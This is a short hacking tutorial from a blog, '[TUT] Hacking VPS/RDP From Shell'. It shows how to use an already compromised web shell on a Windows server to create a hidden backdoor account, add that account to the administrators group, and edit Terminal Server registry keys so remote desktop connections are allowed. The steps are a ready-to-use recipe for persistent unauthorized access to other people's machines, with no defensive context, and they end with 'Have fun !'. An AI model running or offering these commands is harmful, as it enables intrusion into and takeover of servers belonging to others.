J2TEAM Security: A must-have extension for Chrome users. Install now!

[TUT] Hacking VPS/RDP From Shell

[TUT] Hacking VPS/RDP From Shell | Juno_okyo's Blog
First execute command on shell >

Code:
net user l33t p4$sword /add
l33t=username p4$sword=password

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

After execution the shell will give you a result like this :


Code:
The command completed successfully.
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

The user has been added with success now we need to add it on administrators group.


Attention: If the VPS Has an your unknown Language use google translate ( AutoDetect ).

Now to add administrator access to your user >

Code:
net localgroup administrators l33t /add
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

After execution connect to the VPS

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

If the VPS Have an static ip but doesn’t connect on (mstsc) use these commands to allow remote users :

Code:
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
Code:
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
Bingo Have fun !

credits to Ninja
Leader at J2TEAM. Website: https://j2team.dev/

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!